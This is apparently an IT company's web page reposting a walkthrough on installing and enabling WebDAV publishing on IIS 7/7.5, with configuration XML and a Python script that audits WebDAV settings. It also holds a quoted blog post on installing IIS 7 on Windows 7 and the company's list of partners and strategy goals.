Note: This topic discusses using the WebDAV Redirector to connect to your web site. Please see the Using the WebDAV Redirector topic for more information; specifically the Troubleshooting the WebDAV Redirector section if you have trouble using the WebDAV redirector.

Installing WebDAV on IIS 7.0

Prerequisites

The following items are required to complete the procedures in this article:

  • IIS 7.0 must be installed on your server, and the following must be configured:
    • The Default Web Site that is created by the IIS 7.0 installation must still exist.
    • The Internet Information Services Manager must be installed.
    • At least one authentication method must be installed.

Note: If you choose to use Basic Authentication with the WebDAV redirector, you must connect to your server using HTTPS.

  • The WebDAV Redirector must be installed:
    • You must use Server Manager to install the Desktop Experience feature before you can use the WebDAV redirector.

Downloading the Right Version for Your Server

There are two separate downloadable packages for the new WebDAV extension module; you need to download the appropriate package for your version of Windows Server 2008:

Launching the Installation Package

You must run the installation package as an administrator. This can be accomplished by one of the following methods:

  • Logging in to your server using the actual account named “Administrator”, then browsing to the download pages listed above or double-clicking the download package if you have saved it to your server.
  • Logging on using an account with administrator privileges and opening a command-prompt by right-clicking the Command Prompt menu item that is located in the Accessories menu for Windows programs and selecting “Run as administrator”, then typing the appropriate command listed below for your version of Windows to run the installation:
    • 32-bit Windows Versions:
      • msiexec /i webdav_x86_75.msi
    • 64-bit Windows Versions:
      • msiexec /i webdav_x64_75.msi

Walking Through the Installation Process
  1. When the installation package opens, you see the following screen. If you agree to the license terms, check the “I accept” box, then click Install.
  2. The progress indicator will reflect the status of the installation as it proceeds.
  3. After the installation has completed, click Finish.
  4. The WebDAV extension module is now installed.

Installing WebDAV on IIS 7.5

IIS 7.5 for Windows Server 2008 R2
  1. On the taskbar, click Start, point to Administrative Tools, and then click Server Manager.
  2. In the Server Manager hierarchy pane, expand Roles, and then click Web Server (IIS).
  3. In the Web Server (IIS) pane, scroll to the Role Services section, and then click Add Role Services.
  4. On the Select Role Services page of the Add Role Services Wizard, expand Common HTTP Features, select WebDAV Publishing, and then click Next.

  5. On the Confirm Installation Selections page, click Install.
  6. On the Results page, click Close.

IIS 7.5 for Windows 7
  1. On the taskbar, click Start, and then click Control Panel.
  2. In Control Panel, click Programs and Features, and then click Turn Windows Features on or off.
  3. Expand Internet Information Services, then World Wide Web Services, then Common HTTP Features.
  4. Select WebDAV Publishing, and then click OK.

Enabling WebDAV Publishing by Using IIS Manager

The new WebDAV extension module makes it easy to add WebDAV publishing to existing sites by providing you with a wizard that walks you through all of the required steps.

Step 1: Enabling WebDAV and Adding an Authoring Rule

In this first step, we add WebDAV publishing to the Default Web site, and add the required settings to allow the local administrator account to edit the content.

  1. In IIS Manager, in the Connections pane, expand the Sites node in the tree, then click the Default Web Site.
  2. Double-click the WebDAV Authoring Rules feature.
  3. When the WebDAV Authoring Rules page is displayed, click the Enable WebDAV task in the Actions pane.
  4. Once WebDAV has been enabled, click the Add Authoring Rule task in the Actions pane.
  5. When the Add Authoring Rule dialog appears:
    1. Click All content to specify that the rule applies to all content types.
    2. Choose “Specified users” and type “administrator” for the user name.
    3. Select Read, Source, and Write for the permissions.
    4. When you have completed these items, click OK.

Summary

Task completed. You have enabled WebDAV authoring on an existing Web site.

To recap the items that you completed in this step, we added WebDAV publishing to the “Default Web Site” by:

  • Enabling WebDAV for the Web site.
  • Adding an Authoring Rule for the local administrator account for Read, Source, and Write access.

Note: As mentioned earlier, your default request filtering settings may block several file types from WebDAV authoring. If you do not modify your request filtering settings, you may see various errors when you try to publish files that are blocked. For example, if you attempt to upload or download a web.config file you will see errors in your WebDAV client. For more information about configuring your request filtering settings, see the How to Configure WebDAV with Request Filtering walkthrough.

Step 2: Logging in to Your WebDAV Site

In Step 1 above, you enabled WebDAV publishing for your Default Web Site and added an Authoring Rule for the local administrator account for Read, Source, and Write access to your Web site’s content. In this step, you log in using your administrator account.

Ensuring that you have Authorization and Authentication configured

  1. In IIS Manager, in the Connections pane, expand the Sites node in the tree, then click the Default Web Site.
  2. Double-click the Authentication feature.
  3. When the Authentication feature opens, make sure that Windows Authentication is enabled. (Note: You can use Basic Authentication with WebDAV, but the WebDAV redirector will only use Basic authentication with SSL connections.)
  4. In IIS Manager, click the Default Web Site under the Sites node in the tree.
  5. Double-click the Authorization feature.
  6. When the Authorization feature opens, make sure that an Allow rule is defined that includes the administrator account. (For example, the default rule for IIS allowing access to All Users will include the administrator account.)

Logging in to your WebDAV site using your administrator account

  1. On your WebDAV server, open a command prompt session.
  2. Type the following command to connect to your WebDAV server:
    net use * http://localhost/

You now have a drive mapped to your WebDAV-enabled web site using the local administrator account, and based on the authorization rule that we added in Step 1, you have Read, Write, and Source access to the content folder.

Summary

To recap the items that you completed in this step:

  • You verified that your Web site had sufficient Authentication and Authorization settings.
  • You logged in to your WebDAV site as the local administrator.

Enabling WebDAV Publishing by Editing the IIS Configuration Files

You can also add WebDAV publishing to an existing Web site by editing the IIS configuration files.

Note: Editing your applicationHost.config file requires full administrative permissions. This is best accomplished using one of two methods:

  • Log in to your computer using the local “administrator” account.
  • If you are logged in using an account with administrative permissions that is not the local “administrator” account, open Notepad using the “Run as Administrator” option.

Note: The above steps are required because the User Account Control (UAC) security component in Windows Server 2008 will prevent access to your applicationHost.config file. For more information about UAC, please see the following documentation:

The following steps will walk you through all of the required settings to add WebDAV publishing for the Default Web Site.

  1. Using a text editor such as Windows Notepad, open your applicationHost.config file, which is located in your %SystemRoot%\System32\inetsrv\config folder by default.
  2. Scroll to the bottom of your applicationHost.config file and locate the <location> section for your Default Web Site that contains your authentication settings. If this section does not exist, you must add it. This should resemble the following example:
    <location path="Default Web Site">
      <system.webServer>
        <security>
          <authentication>
            <anonymousAuthentication enabled="true" />
            <basicAuthentication enabled="false" />
            <digestAuthentication enabled="false" />
            <windowsAuthentication enabled="true" />
          </authentication>
        </security>
      </system.webServer>
    </location>
  3. Make sure that the Windows authentication method is enabled.
  4. Add a <webdav> section beneath the closing </authentication> tag that will contain your WebDAV settings.
  5. Add an <authoring enabled="true" /> element to the <webdav> element.
  6. Add an <authoringRules> collection with a single entry for <add users="administrator" path="*" access="Read, Write, Source" />.
  7. Your Default Web Site’s settings should now resemble the following example:
    <location path="Default Web Site">
      <system.webServer>
        <security>
          <authentication>
            <windowsAuthentication enabled="true" />
            <anonymousAuthentication enabled="false" />
            <digestAuthentication enabled="false" />
            <basicAuthentication enabled="false" />
          </authentication>
        </security>
        <webdav>
          <authoring enabled="true" />
          <authoringRules>
            <add users="administrator" path="*" access="Read, Write, Source" />
          </authoringRules>
        </webdav>
      </system.webServer>
    </location>
  8. Save your applicationHost.config file.

You should now be able to log in to your WebDAV-enabled site with a WebDAV client and the administrator account, but no other users should be able to access the content using WebDAV.
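To check a hand-edited configuration against the guidance above, the following added example (not part of the original walkthrough or of Microsoft's tooling) parses the <location> blocks and flags WebDAV authoring set up without an authentication method, Basic authentication without HTTPS enforcement, and Write or Source access granted to unnamed users. It assumes two IIS settings that do not appear on this page, the requireSsl attribute of <authoring> and the users="*" wildcard, reads only settings written explicitly in each <location>, and runs on a constructed sample with a hypothetical "Staging" site.

```python
import xml.etree.ElementTree as ET

# Constructed sample: the walkthrough's site plus a hypothetical "Staging" site.
SAMPLE_CONFIG = """<configuration>
  <location path="Default Web Site"><system.webServer>
    <security><authentication>
      <windowsAuthentication enabled="true" />
      <anonymousAuthentication enabled="false" />
      <basicAuthentication enabled="false" />
    </authentication></security>
    <webdav>
      <authoring enabled="true" />
      <authoringRules>
        <add users="administrator" path="*" access="Read, Write, Source" />
      </authoringRules>
    </webdav>
  </system.webServer></location>
  <location path="Staging"><system.webServer>
    <security><authentication>
      <windowsAuthentication enabled="false" />
      <basicAuthentication enabled="true" />
    </authentication></security>
    <webdav>
      <authoring enabled="true" />
      <authoringRules>
        <add users="*" path="*" access="Read, Write" />
      </authoringRules>
    </webdav>
  </system.webServer></location>
</configuration>"""

RISKY = {"write", "source"}  # access flags that expose or change site content

def _on(elem):
    """True when the element exists and carries enabled="true"."""
    return elem is not None and elem.get("enabled", "false").lower() == "true"

def audit_webdav(config_xml):
    """Return (location, finding) pairs for locations with WebDAV authoring on."""
    findings = []
    for loc in ET.fromstring(config_xml).iter("location"):
        authoring = loc.find(".//webdav/authoring")
        if not _on(authoring):
            continue
        site = loc.get("path", "")
        auth = {m.tag: _on(m) for m in loc.findall(".//authentication/*")}
        # Prerequisite: at least one authentication method besides anonymous.
        if not any(on for tag, on in auth.items() if tag != "anonymousAuthentication"):
            findings.append((site, "no-authentication-method"))
        # Basic authentication must only travel over HTTPS (requireSsl: assumption).
        if auth.get("basicAuthentication") and authoring.get("requireSsl", "false").lower() != "true":
            findings.append((site, "basic-auth-without-requireSsl"))
        # Only named accounts should hold Write or Source (users="*": assumption).
        for rule in loc.findall(".//webdav/authoringRules/add"):
            users = {u.strip() for u in rule.get("users", "").split(",")}
            granted = {a.strip().lower() for a in rule.get("access", "").split(",")}
            if "*" in users and granted & RISKY:
                findings.append((site, "wildcard-users-can-" + "+".join(sorted(granted & RISKY))))
    return findings

if __name__ == "__main__":
    for site, finding in audit_webdav(SAMPLE_CONFIG):
        print(f"{site}: {finding}")
```

A location that inherits its authentication settings from the server level lists none of its own and is reported as no-authentication-method, so confirm such findings against the effective configuration.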

Summary

In this task you added WebDAV publishing to your Default Web Site by editing the IIS configuration files. To recap the items that you completed in this task:

  1. You enabled Windows Authentication for the Default Web Site.
  2. You enabled WebDAV for the Default Web Site.
  3. You added a WebDAV authoring rule for the administrator account with Read, Write, and Source access to the Default Web Site.

How to Install Internet Information Services (IIS 7) on Windows 7 Ultimate


If you want to install Microsoft Internet Information Server (IIS 7) on your new Windows 7 computer for the first time after working with IIS 6 for many years, I believe you will be surprised by the improvements and changes both in IIS and in the IIS installation process.
First of all, Microsoft has renamed IIS to Internet Information Services and no longer uses the name Internet Information Server.
In this short guide I will summarize the steps of installing IIS 7 on Windows 7 the way I recently did on my Windows 7 Ultimate Edition PC. I’m using this PC as a home PC, but I work on my web projects at home, so I run SQL Server 2008 R2 as well as IIS and host ASP.NET applications.
So if you want to install Internet Information Services (IIS 7) on a developer computer, you can follow along by reading my notes below.
I do not know about the other editions, but Windows 7 Professional edition and Windows 7 Ultimate edition are able to install and run IIS 7.

IIS Installation

IIS 7 can be installed, and features of IIS 7 can be added or removed, from the Windows 7 “Control Panel > Programs” management screen. You can add and install Windows 7 components and built-in applications using the “Turn Windows features on or off” link.

The Windows Features screen opens and, after a short time, generates a list of the Windows 7 features installed and configured on the current system and a list of the Windows 7 features not yet installed.
When the list is complete, drill down into the Internet Information Services node.

Internet Information Services – IIS 7 World Wide Web Features

Application Development Features

I started with the World Wide Web Services and Application Development Features.
Since I’m an ASP.NET developer and aim to work with ASP.NET on IIS 7, I selected the checkbox next to ASP.NET. When you click on ASP.NET, the following features are selected automatically: .NET Extensibility, ISAPI Extensions and ISAPI Filters.

Security

Then I opened the Security node and marked Windows Authentication beside Request Filtering.
I did not choose any other options, since I do not expect to develop with other authorization and authentication features any time soon.
So I keep them uninstalled. I can install these features in the future.

Common HTTP Features

From the Common HTTP Features, I chose Static Content in order to serve static web pages with .htm and .html file extensions.
I did not select the Directory Browsing feature, as you will see, since directory browsing is one of the basic functions that we remove from each web site on IIS 6 or other IIS versions.
I do not want to work with WebDAV for now, so I keep the WebDAV Publishing feature unchecked too.

Health and Diagnostics

From the Health and Diagnostics tools you will find new logging, monitoring and tracing tools helpful for keeping your web server secure. The Request Monitor and Tracing features will also help you to debug your applications by tracing the web request easily.


Performance Features

In the IIS 7 Performance Features section there are compression functions for static content and dynamic content. You can choose any compression feature.

Internet Information Services – IIS 7 Web Management Tools

The IIS Management Console is a must if you are working with Internet Information Services. It is a handy web management platform that contains tools and provides methods for you to publish, manage, trace and log your web sites and web applications.
I checked the IIS Management Scripts and Tools. I believe these tools and scripts will make my life easier while working on IIS 7.
IIS Management Services is used to manage Internet Information Services from remote computers. If you want to manage your web server from remote computers, you should mark this option. Especially if you are installing IIS 7 on a web server, you will probably want to manage your IIS web server remotely.

After you select all the components, tools and features you require, click the OK button to start installing IIS 7 on Windows 7.
You will have to wait for a few minutes while Windows 7 is installing IIS 7 and changing IIS 7 features.

After the Internet Information Services – IIS 7 installation is completed, you can browse to http://localhost to see whether IIS 7 is installed and running on your Windows 7 computer.
If IIS 7 (Internet Information Services) is up and running, the following static web page will be displayed in your browser.

You can open the Internet Information Services (IIS) Manager console by following the path below.

Open “Control Panel > System and Security > Administrative Tools” then click on Internet Information Services (IIS 7) Manager icon to open the IIS 7 management console.

Here is the Windows7 Ultimate IIS 7 about section.

The RTM build of Windows 7 Ultimate edition is shipped with Internet Information Services version 7.5.7600.16385

I hope you now have an idea of how to install IIS 7 on Windows 7 Ultimate edition. Actually, the IIS 7 install process is straightforward and not much different from installing IIS 7 on Windows Vista. In fact, IIS installation has been done from the Add Remove Windows Components tool since early IIS versions such as IIS 5 and IIS 6.

I believe web developers and IIS administrators who have installed IIS before will not face difficulty installing IIS 7 on Windows 7.

Quoted from source: http://www.kodyaz.com/articles/how-to-install-iis7-on-windows-7.aspx

STRATEGIC PARTNERS OF NOVA DIGITAL


 

Technology partner

Microsoft Small Business Specialist
– Partners Office 365 service deployment for College, University and Enterprise
Partner specializing in the implementation and training of SharePoint Portal Solutions, BizTalk, SQL, Lync and Office Online

Solution Service IT Professional
Partner specializing in deploying virtualization solutions vCenter & vCloud enterprise network for the College, University and Enterprise

Solution Service NAS Professional

Partner specializing in deploying intranet storage solutions and cloud computing to LAN NAS & vCloud for College, University and Enterprise.

Service Provider SERVER & SAN Professional

Partner specializing in deploying solutions for Server & SAN Servers for College, University and Enterprise

– Partner consulting and implementing software system solution services Customs declaration “E-Manifest Vietnam Customs”.

– Partner consulting and deploying Content Management System number Television Telecom Viettel Media

Partner consulting and deploying software products of Financial Management enterprise customers ERP.

Partner consulting and deploying Content number Television Management System news VTC Media

Partner consulting and deploying virtualized infrastructure in IT Training VTC Labs Management.

Partner consulting and deploying System Management Services Virtualization Cloud Computing vCloud CMC IDC HCMC.

Vanguard enterprises in the IT Training

  1. ROBUSTA GLOBAL Technology & Training (www.robusta.vn)
  2. IPMAC
  3. IT Academic Thang Long
  4. NetPro IT Academic.
  5. IT Center of Hanoi Business and Technology University
  6. Institute of IT & Telecom training – Hanoi Open University.
  7. Technology Training Institute graduate – Hanoi University of Technology.
  8. IT Academy – National Economics.
  9. Hue Industrial College.
  10. Nhat Nghe

Business and Media Content Partner

 

 

VASEP

http://www.vasep.com.vn

For 14 years is Partner consulting and implementation support capacity building in ICT Business Association Vietnam seafood (VASEP)

VITAS

http://www.vitas.org.vn

4 years is Partner consulting and building deployment, training and professional management capability offices in Vietnam Tea Association (VITAS)

Vietfores

http://www.vietfores.org

14 years as a consulting partner and technical support Enterprise IT in production and processing of wood furniture under the Vietnam Association of Wood

 

FUTURE DEVELOPMENT

Our commitment

  • Quality of service is the guideline for all our activities, so we always focus on satisfying customer requirements in a spirit of dedicated service and deep understanding of the needs outlined. Improve technology competencies and quality assurance for better products and services.
  • Along with this, we constantly improve our technology capabilities and quality processes to provide products and services of the best quality.
  • Sincere and active in building partnerships for mutual development.
  • Internal unity, striving for education career advancement.
  • Reinvestment in society through community education activities.

Development strategy

  • Invest in new technology to keep moving forward with strategic technology partners.
  • Improve partner relationships for better business opportunities.
  • Build a trusted relationship with traditional customers.
  • Enhance training activities and technology transfer with other corporate partners.
  • Human development strategy based on a profound philosophy of humanity.
  • Become a leading company in providing training services and technology solutions in APAC.
